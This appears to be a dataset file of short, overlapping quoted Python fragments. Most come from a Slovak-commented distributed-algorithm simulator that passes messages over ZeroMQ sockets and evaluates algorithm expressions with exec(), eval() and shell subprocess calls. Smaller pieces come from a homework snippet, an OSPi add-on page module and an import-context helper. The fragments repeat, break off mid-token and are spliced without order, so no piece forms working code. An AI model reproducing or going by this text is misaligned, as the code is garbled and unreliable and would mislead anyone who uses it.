_logger.info(\"Entity: {0} | Action: SEND | Message :", "_Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} -> {2}", "# Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav. _n =", "predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom #", "samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To", "%s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" %", "na poziícii premenná # uložíme si do premennej _result hodnotu True. Ak sa", "run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients):", "_neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context = Context()", "0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller()", "== POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message", "stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type == 'string':", "funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý", "# správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme", "_process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression))", "rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota a vo", "1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne #", "_n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. 
while _n is", "state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita", "prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne", "hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message", "_result = [] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii", "ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1}", "% _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie", "= _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse =", "in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom", "New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na", "_Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError", "_n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message,", "_self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse:", "= [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER", "_self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except", "Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia", "Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných", "| Wrong value for output cast to int! 
-> {1} -> {2} \".format(_self._id,", "return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input =", "vzorom. Ak je na rovnakej pozícii vo vzore a # prijatej správe tá", "def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while", "if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy a", "príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy", "if type(_message) is not tuple: _message = (_message, ) # Ak je prijímateľ", "send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade", "import Thread from pickle import dumps, loads from logging import getLogger from soda.helpers", "# Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme", "_self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej", "_self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors", "jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma", "ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec()", "def read(): # V nekonečnom cykle sledujeme, či na soket prišla správa. 
while", "entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval", "_self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného", "istá hodnota a vo vzore nieje na poziícii premenná # uložíme si do", "int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket", "for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] #", "| Message : {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages", "\"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s =", "evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): #", "entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi", "deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či na", "| Old state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state))", "log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result =", "from threading import Thread from pickle import dumps, loads from logging import getLogger", "# Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie.", "not tuple: _result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False)", "# ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať #", "= [] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo", "| Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]()", "pozícii premenná úložíme hodnotu False. 
Pre pozície # kde je vo vzore premenná", "_n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state :", "s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1.", "\"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\":", "_id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip =", "Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send", "not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole", "# sa zhoduje so vzorom. if False not in _result: # Pre pozície", "+ _j + \"'\" _expression = \"%s = %s\" % (_identifier, _j) #", "stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression):", "= _new_state # Ak je tento nový stav terminujúci tak ukončíme správanie. if", "všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p:", "z príslušnej # pozície v správe do tejto premennej. for _i, _j in", "správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia", "správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in", "správou, ktorú sme # prijali aby sme mohli následne v metóde run() identifikovať", "= dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor #", "\"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity", "__init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip", "stav na nový. 
_self._state = _new_state # Ak je tento nový stav terminujúci", "Ak sa hodnoty nezhodujú # a vo vzore nie je na pozícii premenná", "_logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id,", "| Action: RECEIVED | Message : {1} | From entity : {2} \".format(_self._id,", "flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a", "Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def", "@support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output=", "_input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) #", "# Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali", "premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is", "impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior =", "_self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, )", "svoj stav na nový. _self._state = _new_state # Ak je tento nový stav", "else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n", "tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre", "_recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) #", "typu DEALER [18]. 
Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme", "= False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" %", "každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu", "objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a ich", "uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None #", "False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port)", "je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients", "{0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as", "Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for", "ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node", "_self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context", "pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])):", "Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície", "Porovnáme správu so vzorom. 
Ak je na rovnakej pozícii vo vzore a #", "subprocess import run, PIPE from shlex import split from copy import deepcopy _logger", "tuple: _message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho", "} def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu.", "{2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command", "_completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type", "obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0}", "RECEIVED | Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id))", "správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To entity", "\"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout)", "v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i)", "vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states:", "\"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self):", "aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity.", "sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message", "_self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) # Ak je", "_context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket,", "ich hodnôt. 
try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression", "nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def", "_self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\":", "premenná úložíme hodnotu False. Pre pozície # kde je vo vzore premenná si", "vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom", "# Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej", "{0} | Action: RECEIVED | Message : {1} | From entity : {2}", "list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so", "{1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu", "sa hodnoty nezhodujú # a vo vzore nie je na pozícii premenná úložíme", "odoslaných správ pre entitu o 1. for _n in _recipients: try: _out_socket =", "následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message)", "si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo", "ktorú sme # prijali aby sme mohli následne v metóde run() identifikovať #", "Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa.", "| Action: SEND | Trying to send message to non existing neighbour! ->", "if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do", "Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať", "_Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! 
-> {1}", "tuple: _result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False) else:", "Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except", "as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! ->", "type(_i) is tuple: _identifier, _ = _i if type(_j) is str: _j =", "argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients))", "konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple:", "ho na pole. if type(_recipients) is int: _recipients = [_recipients] * 1 #", "| New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav", "_Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN |", "| Wrong value for output cast to float! -> {1} -> {2} \".format(_self._id,", "uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node", "by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False", "_expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong", "None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0}", "na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa.", "terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): #", "EXEC | Wrong value for output cast to int! -> {1} -> {2}", "'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. 
Ak je na", "nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka", "# cast to correct output type if _output_type == 'string': _process_output = \"'\"", "= _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast", "_self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket", "prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None", "(_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" %", "= \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s", "POLLIN, DEALER from threading import Thread from pickle import dumps, loads from logging", "_self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy", "hodnota a vo vzore nieje na poziícii premenná # uložíme si do premennej", "of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as", "_states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state", "či na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla", "if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa", "import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from", "so vzorom. if False not in _result: # Pre pozície kde je vo", "zmení svoj stav na nový. _self._state = _new_state # Ak je tento nový", "# V nekonečnom cykle sledujeme, či na soket prišla správa. 
while True: _socks", "{2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout)", "využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec()", "Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu", "_expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré", "# aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result", "# Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not", "elif _i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) #", "None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3", "exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input", "spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior", "_output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process =", "Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec", "ktoré používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho", "!= 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak je", "| Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit()", "_self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to", "čítať prijaté správy. 
if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0}", "_logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior", "== 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int':", "_expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\":", "správa # sa zhoduje so vzorom. if False not in _result: # Pre", "jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python", "exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type", "\".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE", "IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False #", "alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE'", "_ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors", "premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1}", "správe tá istá hodnota a vo vzore nieje na poziícii premenná # uložíme", "uložíme hodnotu z príslušnej # pozície v správe do tejto premennej. for _i,", "Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré", ": {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1", "aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while", "if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node =", "správy a odosieľatela. 
_pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} |", "poziícii premenná # uložíme si do premennej _result hodnotu True. Ak sa hodnoty", "úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity:", "value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command,", "{1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old", "_poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy']", "-> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output =" ]
[ "def God(): return[Man(), Woman()] class Human: pass class Man(Human): pass class Woman(Human): pass", "<filename>HW9/YuliiaKutsyk/task_9_3_adam_and_eve.py def God(): return[Man(), Woman()] class Human: pass class Man(Human): pass class Woman(Human):" ]
[ "'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here ####", "'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example custom class", "custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code", "page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3',", "### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert", "functions and classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add", "classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\"", "'<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>'", "#Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>' return custpg", "import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) #", "'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example", "'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions", "GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form", "html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>' return", "ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example:", "= '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon", "description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. 
custpg", "class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom", "Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1',", "new functions and classes here #### ### Example custom class ### class custom_page_1:", "#### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add", "class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n'", "<gh_stars>1-10 #!/usr/bin/python import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1',", "#### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1',", "#### add new functions and classes here #### ### Example custom class ###", "Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg =", "here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg +=", "### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg", "def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. 
custpg += '<body>Hello", "custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE", "here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) ####", "# example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and", "'/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example custom", "urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3'])", "ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new", "#### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self):", "example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes", "'/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ###", "add new functions and classes here #### ### Example custom class ### class", "\"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here.", "new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2',", "here #### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def", "custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. 
custpg += '<body>Hello form an", "and classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add description", "any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2',", "(['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here", "#!/usr/bin/python import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1'])" ]
[ "OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\"", ">>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> #", "--------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead", "if callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg", "import sys import os.path as p from importlib import import_module # --------------------------- #", "Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports # ---------------------------", "None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module))", "is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def", "if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected", "def check_group(value, group): if value not in group: tag = type(value).__name__ msg =", "else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # ---------------------------", "(\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module", "= import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends", "# module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param", "self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback):", "\"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import", "'/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>> with 
